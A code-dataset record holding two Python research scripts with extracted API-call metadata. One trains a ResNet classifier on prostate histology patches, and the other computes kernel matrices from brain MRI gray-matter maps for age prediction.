import Leg\n'), ((32267, 32287), 'CTL.funcs.xplib.xp.sum', 'xplib.xp.sum', (['self.a'], {}), '(self.a)\n', (32279, 32287), True, 'import CTL.funcs.xplib as xplib\n'), ((32347, 32377), 'CTL.funcs.xplib.xp.sum', 'xplib.xp.sum', (['(self.a * weights)'], {}), '(self.a * weights)\n', (32359, 32377), True, 'import CTL.funcs.xplib as xplib\n'), ((10234, 10263), 'CTL.funcs.xplib.xp.diag_indices', 'xplib.xp.diag_indices', (['dim', 'l'], {}), '(dim, l)\n', (10255, 10263), True, 'import CTL.funcs.xplib as xplib\n'), ((14221, 14359), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', (['"""Tensor() cannot accept parameters where legs, shape and data being None simultaneously."""'], {'location': 'funcName'}), "(\n 'Tensor() cannot accept parameters where legs, shape and data being None simultaneously.'\n , location=funcName)\n", (14239, 14359), True, 'import CTL.funcs.funcs as funcs\n')]
|
import argparse
from torchvision import transforms
import time, os, sys
from time import strftime
from sklearn.metrics import mean_squared_error, accuracy_score, hamming_loss, roc_curve, auc, f1_score, confusion_matrix
import copy
from torch.utils.data import DataLoader, Dataset
import pdb
from prostate_utils import *
import glob
# Editorial note: the symbols used below (np, torch, nn, optim, models, cudnn, Variable)
# are assumed to be re-exported by prostate_utils; the explicit imports here are a
# safety net and are harmless if that assumption holds.
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
from torchvision import models
parser = argparse.ArgumentParser(description='PyTorch Digital Mammography Training')
parser.add_argument('--lr', default=1e-2, type=float, help='learning rate')
parser.add_argument('--net_type', default='RESNET_34_prostate_trueVal_', type=str, help='model')
parser.add_argument('--net_depth', default=34, type=int)
parser.add_argument('--weight_decay', default=1e-4, type=float, help='weight decay')
parser.add_argument('--finetune', '-f', action='store_true', help='Fine tune pretrained model')
parser.add_argument('--batch_size', default=256, type=int)
parser.add_argument('--num_workers', default=8, type=int)
parser.add_argument('--num_epochs', default=100, type=int, help='Number of epochs in training')
parser.add_argument('--lr_decay_epoch', default=10, type = int)
parser.add_argument('--max_lr_decay', default = 60, type = int)
parser.add_argument('--APS', default = 175, type = int)
parser.add_argument('--N_subimgs', default = 5, type = int)
parser.add_argument('--N_limit', default = 100000, type = int)
parser.add_argument('--check_after', default=2,
type=int, help='check the network after check_after epoch')
parser.add_argument('--note', type=str, default='none', help="note while running the code")
args = parser.parse_args()
with open(os.path.basename(__file__)) as f:
codes = f.readlines()
print('\n\n' + '=' * 20 + os.path.basename(__file__) + '=' * 20)
for c in codes:
print(c[:-1])
with open('prostate_utils.py') as f:
codes = f.readlines()
print('\n\n' + '=' * 20 + 'prostate_utils.py' + '=' * 20)
for c in codes:
print(c[:-1])
print(args)
rand_seed = 26700
if rand_seed is not None:
np.random.seed(rand_seed)
torch.manual_seed(rand_seed)
torch.cuda.manual_seed(rand_seed)
use_gpu = torch.cuda.is_available()
print('Using GPU: ', use_gpu)
device = torch.device("cuda:0")
mean = [0.6462, 0.5070, 0.8055] # for Prostate cancer
std = [0.1381, 0.1674, 0.1358]
APS = args.APS # default = 448
input_size = 224
data_transforms = {
'train': transforms.Compose([ # 2 steps of data augmentation for training
transforms.RandomCrop(APS), # perform random crop manually in the dataloader
transforms.Scale(input_size),
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.ColorJitter(brightness=0.3, contrast=0.3, saturation=0.3, hue=0.1),
transforms.ToTensor(),
transforms.Normalize(mean, std)]),
'val': transforms.Compose([
transforms.Scale(input_size),
transforms.ToTensor(),
transforms.Normalize(mean, std)])
}
train_seer_fol = '/data10/shared/hanle/extract_prad_seer/patches_prad_seer'
train_beatrice_fol = '/data10/shared/hanle/extract_prad_seer/patches_prad_Beatrice_training'
val_fol = '/data10/shared/hanle/extract_prad_seer/patches_prad_Beatrice_validation'
img_trains = glob.glob(os.path.join(train_seer_fol, '*png')) + glob.glob(os.path.join(train_beatrice_fol, '*png'))
img_vals = glob.glob(os.path.join(val_fol, '*png'))
print('len of train/val set: ', len(img_trains), len(img_vals))
train_set = data_loader(img_trains, transform = data_transforms['train'])
train_loader = DataLoader(train_set, batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers)
val_set = data_loader(img_vals, transform = data_transforms['val'])
val_loader = DataLoader(val_set, batch_size=args.batch_size, shuffle=False, num_workers=args.num_workers)
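# val_fn_epoch: one gradient-free pass over val_loader; returns accuracy,
# macro F1, predictions, labels, mean loss, and the per-class label counts.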
def val_fn_epoch(val_fn = None, crit = None, val_loader = None):
nline = 0
running_loss = 0.0
labels_val = torch.zeros(0).type(torch.LongTensor)
preds_val = torch.zeros(0).type(torch.LongTensor).to(device)
with torch.no_grad():
for ix, batch in enumerate(val_loader):
if (len(val_loader.dataset) - nline) < 2: continue
inputs, targets = batch
labels_val = torch.cat((labels_val, targets.type(torch.LongTensor)))
inputs = Variable(inputs.to(device))
targets = Variable(targets.type(torch.LongTensor).to(device))
output = val_fn(inputs)
if type(output) == tuple:
output,_ = output
N = output.size(0)
loss = crit(output, targets)
running_loss += loss.item() * N
_, preds = torch.max(output.data, 1) # get the argmax index along the axis 1
preds_val = torch.cat((preds_val, preds))
labels_val = labels_val.to(device)
val_acc = accuracy_score(labels_val, preds_val)
f1 = f1_score(labels_val, preds_val, average='macro')
unique, counts = np.unique(np.array(labels_val), return_counts=True)
return val_acc, f1, preds_val, labels_val, running_loss/labels_val.size(0), dict(zip(unique, counts))
def train_model(model, criterion = None, num_epochs=100, train_loader = train_loader, val_loader = val_loader):
best_f1 = 0
best_epoch = 0
start_training = time.time()
for epoch in range(num_epochs):
start = time.time()
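        # Step learning-rate schedule: full args.lr for the first 15 epochs,
        # then divided by 2, 10, 50 and 100 at fixed epoch milestones.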
if epoch < 15: lr = args.lr
elif epoch < 30: lr = args.lr/2
elif epoch < 40: lr = args.lr/10
elif epoch < 60: lr = args.lr / 50
else: lr = args.lr/100
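        # From epoch 50 on, unfreeze the whole backbone; before that only the
        # replaced fc head (created in main()) has requires_grad=True.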
if epoch >= 50:
for param in model.parameters():
param.requires_grad = True
optimizer = optim.SGD(filter(lambda p: p.requires_grad, model.parameters()), lr=lr, momentum=0.9, weight_decay=args.weight_decay)
print('Epoch {}/{}'.format(epoch + 1, num_epochs))
print('lr: {:.6f}'.format(lr))
print('-' * 50)
for phase in ['train']:
if phase == 'train':
data_loader = train_loader
model.train(True)
else:
data_loader = val_loader
model.train(False)
running_loss = 0.0
running_corrects = 0
N_tot = 0
labels_train = torch.zeros(0).type(torch.LongTensor)
preds_train = torch.zeros(0).type(torch.LongTensor).to(device)
for ix, data in enumerate(data_loader):
if (len(data_loader.dataset) - N_tot) < 3: continue
inputs, labels = data
labels_train = torch.cat((labels_train, labels.type(torch.LongTensor)))
inputs = Variable(inputs.to(device))
labels = Variable(labels.type(torch.LongTensor).to(device))
optimizer.zero_grad()
outputs = model(inputs)
if type(outputs) == tuple: # for inception_v3 output
outputs,_ = outputs
_, preds = torch.max(outputs.data, 1)
loss = criterion(outputs, labels)
if phase == 'train':
loss.backward()
optimizer.step()
N_tot += outputs.size(0)
running_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds == labels.data)
preds_train = torch.cat((preds_train, preds))
unique, counts = np.unique(np.array(labels_train), return_counts=True)
print('| Epoch:[{}][{}/{}]\tTrain_Loss: {:.4f}\tAccuracy: {:.4f}\tTrain_data: {}\tTime: {:.2f} mins'.format(epoch + 1, ix + 1,
len(data_loader.dataset)//args.batch_size,
running_loss / N_tot, running_corrects.item() / N_tot, dict(zip(unique, counts)), (time.time() - start)/60.0))
try:
conf_matrix = confusion_matrix(labels_train.to(device), preds_train, labels=[0, 1])
print(conf_matrix)
except:
print('could not compute confusion matrix.')
sys.stdout.flush()
############ VALIDATION #############################################
if (epoch + 1) % args.check_after == 0:
model.eval()
start = time.time()
val_acc, f1, Pr, Tr, val_loss, labels_val = val_fn_epoch(val_fn = model, crit = criterion, val_loader = val_loader)
print("Epoch: {}\tVal_Loss: {:.4f}\tAccuracy: {:.4f}\tF1-score: {:.4f}\tVal_data: {}\tTime: {:.3f}mins".format(
(epoch + 1), val_loss, val_acc, f1,labels_val, (time.time() - start)/60.0))
try:
conf_matrix = confusion_matrix(Tr, Pr, labels=[0, 1])
print(conf_matrix)
except:
print('could not compute confusion matrix.')
start = time.time()
# deep copy the model
if f1 > best_f1 and epoch > 2:
print('Saving model')
best_f1 = f1
best_epoch = epoch + 1
best_model = copy.deepcopy(model)
state = {
'model': best_model,
'f1-score': best_f1,
'args': args,
'lr': lr,
'saved_epoch': epoch,
}
if not os.path.isdir('checkpoint'):
os.mkdir('checkpoint')
save_point = './checkpoint/'
if not os.path.isdir(save_point):
os.mkdir(save_point)
saved_model_fn = args.net_type + '_' + '_' + strftime('%m%d_%H%M')
torch.save(state, save_point + saved_model_fn + '_' + str(best_f1) + '_' + str(epoch) + '.t7')
print('=======================================================================')
time_elapsed = time.time() - start_training
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
print('Best F1-score: {:4f} at epoch: {}'.format(best_f1, best_epoch))
def main():
sys.setrecursionlimit(10000)
if args.net_depth == 34:
model = models.resnet34(pretrained=True)
elif args.net_depth == 50:
model = models.resnet50(pretrained=True)
elif args.net_depth == 101:
model = models.resnet101(pretrained=True)
elif args.net_depth == 152:
model = models.resnet152(pretrained=True)
for param in model.parameters():
param.requires_grad = False
num_in = model.fc.in_features
model.fc = nn.Linear(num_in, 2)
model = model.to(device)
model = torch.nn.DataParallel(model, device_ids=[0,1])
cudnn.benchmark = True
print(model)
print('Start training ... ')
criterion = nn.CrossEntropyLoss().to(device)
train_model(model, criterion, num_epochs=args.num_epochs, train_loader=train_loader, val_loader=val_loader)
if __name__ == "__main__":
main()
|
[
"os.mkdir",
"argparse.ArgumentParser",
"sklearn.metrics.accuracy_score",
"time.strftime",
"sklearn.metrics.f1_score",
"sys.stdout.flush",
"torchvision.transforms.Normalize",
"sys.setrecursionlimit",
"os.path.join",
"torch.utils.data.DataLoader",
"torchvision.transforms.Scale",
"copy.deepcopy",
"torchvision.transforms.RandomHorizontalFlip",
"os.path.basename",
"torchvision.transforms.RandomCrop",
"torchvision.transforms.ColorJitter",
"os.path.isdir",
"torchvision.transforms.RandomVerticalFlip",
"time.time",
"sklearn.metrics.confusion_matrix",
"torchvision.transforms.ToTensor"
] |
[((342, 417), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""PyTorch Digital Mammography Training"""'}), "(description='PyTorch Digital Mammography Training')\n", (365, 417), False, 'import argparse\n'), ((3535, 3633), 'torch.utils.data.DataLoader', 'DataLoader', (['train_set'], {'batch_size': 'args.batch_size', 'shuffle': '(True)', 'num_workers': 'args.num_workers'}), '(train_set, batch_size=args.batch_size, shuffle=True, num_workers\n =args.num_workers)\n', (3545, 3633), False, 'from torch.utils.data import DataLoader, Dataset\n'), ((3710, 3807), 'torch.utils.data.DataLoader', 'DataLoader', (['val_set'], {'batch_size': 'args.batch_size', 'shuffle': '(False)', 'num_workers': 'args.num_workers'}), '(val_set, batch_size=args.batch_size, shuffle=False, num_workers=\n args.num_workers)\n', (3720, 3807), False, 'from torch.utils.data import DataLoader, Dataset\n'), ((3350, 3379), 'os.path.join', 'os.path.join', (['val_fol', '"""*png"""'], {}), "(val_fol, '*png')\n", (3362, 3379), False, 'import time, os, sys\n'), ((4834, 4871), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['labels_val', 'preds_val'], {}), '(labels_val, preds_val)\n', (4848, 4871), False, 'from sklearn.metrics import mean_squared_error, accuracy_score, hamming_loss, roc_curve, auc, f1_score, confusion_matrix\n'), ((4881, 4929), 'sklearn.metrics.f1_score', 'f1_score', (['labels_val', 'preds_val'], {'average': '"""macro"""'}), "(labels_val, preds_val, average='macro')\n", (4889, 4929), False, 'from sklearn.metrics import mean_squared_error, accuracy_score, hamming_loss, roc_curve, auc, f1_score, confusion_matrix\n'), ((5280, 5291), 'time.time', 'time.time', ([], {}), '()\n', (5289, 5291), False, 'import time, os, sys\n'), ((10207, 10235), 'sys.setrecursionlimit', 'sys.setrecursionlimit', (['(10000)'], {}), '(10000)\n', (10228, 10235), False, 'import time, os, sys\n'), ((1607, 1633), 'os.path.basename', 'os.path.basename', (['__file__'], {}), '(__file__)\n', (1623, 1633), False, 'import time, os, sys\n'), ((3237, 3273), 'os.path.join', 'os.path.join', (['train_seer_fol', '"""*png"""'], {}), "(train_seer_fol, '*png')\n", (3249, 3273), False, 'import time, os, sys\n'), ((3287, 3327), 'os.path.join', 'os.path.join', (['train_beatrice_fol', '"""*png"""'], {}), "(train_beatrice_fol, '*png')\n", (3299, 3327), False, 'import time, os, sys\n'), ((5345, 5356), 'time.time', 'time.time', ([], {}), '()\n', (5354, 5356), False, 'import time, os, sys\n'), ((9989, 10000), 'time.time', 'time.time', ([], {}), '()\n', (9998, 10000), False, 'import time, os, sys\n'), ((1693, 1719), 'os.path.basename', 'os.path.basename', (['__file__'], {}), '(__file__)\n', (1709, 1719), False, 'import time, os, sys\n'), ((2447, 2473), 'torchvision.transforms.RandomCrop', 'transforms.RandomCrop', (['APS'], {}), '(APS)\n', (2468, 2473), False, 'from torchvision import transforms\n'), ((2538, 2566), 'torchvision.transforms.Scale', 'transforms.Scale', (['input_size'], {}), '(input_size)\n', (2554, 2566), False, 'from torchvision import transforms\n'), ((2576, 2609), 'torchvision.transforms.RandomHorizontalFlip', 'transforms.RandomHorizontalFlip', ([], {}), '()\n', (2607, 2609), False, 'from torchvision import transforms\n'), ((2619, 2650), 'torchvision.transforms.RandomVerticalFlip', 'transforms.RandomVerticalFlip', ([], {}), '()\n', (2648, 2650), False, 'from torchvision import transforms\n'), ((2660, 2737), 'torchvision.transforms.ColorJitter', 'transforms.ColorJitter', ([], {'brightness': '(0.3)', 'contrast': '(0.3)', 
'saturation': '(0.3)', 'hue': '(0.1)'}), '(brightness=0.3, contrast=0.3, saturation=0.3, hue=0.1)\n', (2682, 2737), False, 'from torchvision import transforms\n'), ((2747, 2768), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (2766, 2768), False, 'from torchvision import transforms\n'), ((2778, 2809), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['mean', 'std'], {}), '(mean, std)\n', (2798, 2809), False, 'from torchvision import transforms\n'), ((2854, 2882), 'torchvision.transforms.Scale', 'transforms.Scale', (['input_size'], {}), '(input_size)\n', (2870, 2882), False, 'from torchvision import transforms\n'), ((2892, 2913), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (2911, 2913), False, 'from torchvision import transforms\n'), ((2923, 2954), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['mean', 'std'], {}), '(mean, std)\n', (2943, 2954), False, 'from torchvision import transforms\n'), ((8060, 8078), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (8076, 8078), False, 'import time, os, sys\n'), ((8267, 8278), 'time.time', 'time.time', ([], {}), '()\n', (8276, 8278), False, 'import time, os, sys\n'), ((8884, 8895), 'time.time', 'time.time', ([], {}), '()\n', (8893, 8895), False, 'import time, os, sys\n'), ((8691, 8730), 'sklearn.metrics.confusion_matrix', 'confusion_matrix', (['Tr', 'Pr'], {'labels': '[0, 1]'}), '(Tr, Pr, labels=[0, 1])\n', (8707, 8730), False, 'from sklearn.metrics import mean_squared_error, accuracy_score, hamming_loss, roc_curve, auc, f1_score, confusion_matrix\n'), ((9133, 9153), 'copy.deepcopy', 'copy.deepcopy', (['model'], {}), '(model)\n', (9146, 9153), False, 'import copy\n'), ((9441, 9468), 'os.path.isdir', 'os.path.isdir', (['"""checkpoint"""'], {}), "('checkpoint')\n", (9454, 9468), False, 'import time, os, sys\n'), ((9494, 9516), 'os.mkdir', 'os.mkdir', (['"""checkpoint"""'], {}), "('checkpoint')\n", (9502, 9516), False, 'import time, os, sys\n'), ((9593, 9618), 'os.path.isdir', 'os.path.isdir', (['save_point'], {}), '(save_point)\n', (9606, 9618), False, 'import time, os, sys\n'), ((9644, 9664), 'os.mkdir', 'os.mkdir', (['save_point'], {}), '(save_point)\n', (9652, 9664), False, 'import time, os, sys\n'), ((9731, 9752), 'time.strftime', 'strftime', (['"""%m%d_%H%M"""'], {}), "('%m%d_%H%M')\n", (9739, 9752), False, 'from time import strftime\n'), ((7786, 7797), 'time.time', 'time.time', ([], {}), '()\n', (7795, 7797), False, 'import time, os, sys\n'), ((8607, 8618), 'time.time', 'time.time', ([], {}), '()\n', (8616, 8618), False, 'import time, os, sys\n')]
|
"""File with the preprocessing tools."""
import os
import numpy as np
import nibabel as nib
import pandas as pd
from tqdm import tqdm
from sklearn.metrics import pairwise_distances
from sklearn.metrics.pairwise import linear_kernel
# Change this path
path = '' # folder containing the gray-matter maps
# Folders with the resulting data
output_data = 'Data/'
output_kernels = 'Kernels/'
output_target = 'Target/'
# List of all the NIfTI files in the input folder
nifti_images = [file for file in os.listdir(path) if file.endswith('.nii.gz')]
# Convert each NIfTI image into a numpy.ndarray
for file in nifti_images:
img = nib.load(os.path.join(path, file))
img_data = img.get_fdata()
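    # np.save appends the '.npy' extension, so each map is stored as <subject_ID>.npy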
np.save(os.path.join(output_data, file.split('_')[0]), img_data)
# Get the subject IDs
subjects = []
listdir = os.listdir(output_data)
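# Ignore hidden files (e.g. '.DS_Store') that are not subject arrays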
listdir = [x for x in listdir if not x.startswith('.')]
n_samples = len(listdir)
# Compute the kernels using batches to reduce the memory usage
batches = np.array_split(np.arange(len(listdir)), 20)
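# np.array_split over np.arange yields contiguous index blocks, so the kernel
# matrices can be filled block by block with the simple slices used below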
lin_kernel = np.empty((n_samples, n_samples))
euclidean_norm = np.empty((n_samples, n_samples))
for batch_i in tqdm(batches):
data_i = []
for i in batch_i:
data_i.append(np.load(output_data + listdir[i]).ravel())
subjects.append(listdir[i].split('.')[0])
data_i = np.asarray(data_i)
for batch_j in batches:
data_j = []
for j in batch_j:
data_j.append(np.load(output_data + listdir[j]).ravel())
data_j = np.asarray(data_j)
        # Squared Euclidean distances and linear (Gram) kernel for this block of subjects
euclidean_norm[batch_i[0]:batch_i[-1] + 1,
batch_j[0]:batch_j[-1] + 1] = (
pairwise_distances(data_i, data_j, metric='euclidean') ** 2
)
lin_kernel[batch_i[0]:batch_i[-1] + 1, batch_j[0]:batch_j[-1] + 1] = (
linear_kernel(data_i, data_j)
)
# Save the kernels in CSV files
linear_kernel_df = pd.DataFrame(lin_kernel, index=subjects, columns=subjects)
linear_kernel_df.to_csv(output_kernels + 'linear_kernel.csv')
euclidean_norm_df = pd.DataFrame(euclidean_norm, index=subjects,
columns=subjects)
euclidean_norm_df.to_csv(output_kernels + 'euclidean_norm.csv')
# Save the target variable in a CSV file
# Change this path
df_y = pd.read_csv("/Volumes/dtlake01.aramis/users/clinica/pac2019/dataset/"
"PAC2019_BrainAge_Training.csv")
y = []
for subject in subjects:
y.append(df_y[df_y['subject_ID'] == subject]['age'].item())
df_y_new = pd.Series(y, index=subjects)
df_y_new.to_csv(output_target + 'age.csv')
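
# --- Hedged usage sketch (not part of the original preprocessing) ---
# The precomputed linear kernel saved above can be fed directly to a kernel
# method such as scikit-learn's KernelRidge with kernel='precomputed'. The
# alpha value is an arbitrary placeholder, and fitting/predicting on the full
# kernel matrix only illustrates the expected shapes; a real analysis would
# cross-validate on sub-blocks of the kernel.
from sklearn.kernel_ridge import KernelRidge

krr = KernelRidge(alpha=1.0, kernel='precomputed')
krr.fit(linear_kernel_df.values, df_y_new.loc[linear_kernel_df.index].values)
train_predictions = krr.predict(linear_kernel_df.values)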
|
[
"pandas.DataFrame",
"tqdm.tqdm",
"numpy.load",
"sklearn.metrics.pairwise.linear_kernel",
"pandas.read_csv",
"numpy.empty",
"numpy.asarray",
"sklearn.metrics.pairwise_distances",
"pandas.Series",
"os.path.join",
"os.listdir"
] |
[((789, 812), 'os.listdir', 'os.listdir', (['output_data'], {}), '(output_data)\n', (799, 812), False, 'import os\n'), ((1026, 1058), 'numpy.empty', 'np.empty', (['(n_samples, n_samples)'], {}), '((n_samples, n_samples))\n', (1034, 1058), True, 'import numpy as np\n'), ((1076, 1108), 'numpy.empty', 'np.empty', (['(n_samples, n_samples)'], {}), '((n_samples, n_samples))\n', (1084, 1108), True, 'import numpy as np\n'), ((1125, 1138), 'tqdm.tqdm', 'tqdm', (['batches'], {}), '(batches)\n', (1129, 1138), False, 'from tqdm import tqdm\n'), ((1908, 1966), 'pandas.DataFrame', 'pd.DataFrame', (['lin_kernel'], {'index': 'subjects', 'columns': 'subjects'}), '(lin_kernel, index=subjects, columns=subjects)\n', (1920, 1966), True, 'import pandas as pd\n'), ((2050, 2112), 'pandas.DataFrame', 'pd.DataFrame', (['euclidean_norm'], {'index': 'subjects', 'columns': 'subjects'}), '(euclidean_norm, index=subjects, columns=subjects)\n', (2062, 2112), True, 'import pandas as pd\n'), ((2278, 2387), 'pandas.read_csv', 'pd.read_csv', (['"""/Volumes/dtlake01.aramis/users/clinica/pac2019/dataset/PAC2019_BrainAge_Training.csv"""'], {}), "(\n '/Volumes/dtlake01.aramis/users/clinica/pac2019/dataset/PAC2019_BrainAge_Training.csv'\n )\n", (2289, 2387), True, 'import pandas as pd\n'), ((2509, 2537), 'pandas.Series', 'pd.Series', (['y'], {'index': 'subjects'}), '(y, index=subjects)\n', (2518, 2537), True, 'import pandas as pd\n'), ((1306, 1324), 'numpy.asarray', 'np.asarray', (['data_i'], {}), '(data_i)\n', (1316, 1324), True, 'import numpy as np\n'), ((482, 498), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (492, 498), False, 'import os\n'), ((616, 640), 'os.path.join', 'os.path.join', (['path', 'file'], {}), '(path, file)\n', (628, 640), False, 'import os\n'), ((1486, 1504), 'numpy.asarray', 'np.asarray', (['data_j'], {}), '(data_j)\n', (1496, 1504), True, 'import numpy as np\n'), ((1816, 1845), 'sklearn.metrics.pairwise.linear_kernel', 'linear_kernel', (['data_i', 'data_j'], {}), '(data_i, data_j)\n', (1829, 1845), False, 'from sklearn.metrics.pairwise import linear_kernel\n'), ((1654, 1708), 'sklearn.metrics.pairwise_distances', 'pairwise_distances', (['data_i', 'data_j'], {'metric': '"""euclidean"""'}), "(data_i, data_j, metric='euclidean')\n", (1672, 1708), False, 'from sklearn.metrics import pairwise_distances\n'), ((1200, 1233), 'numpy.load', 'np.load', (['(output_data + listdir[i])'], {}), '(output_data + listdir[i])\n', (1207, 1233), True, 'import numpy as np\n'), ((1426, 1459), 'numpy.load', 'np.load', (['(output_data + listdir[j])'], {}), '(output_data + listdir[j])\n', (1433, 1459), True, 'import numpy as np\n')]
|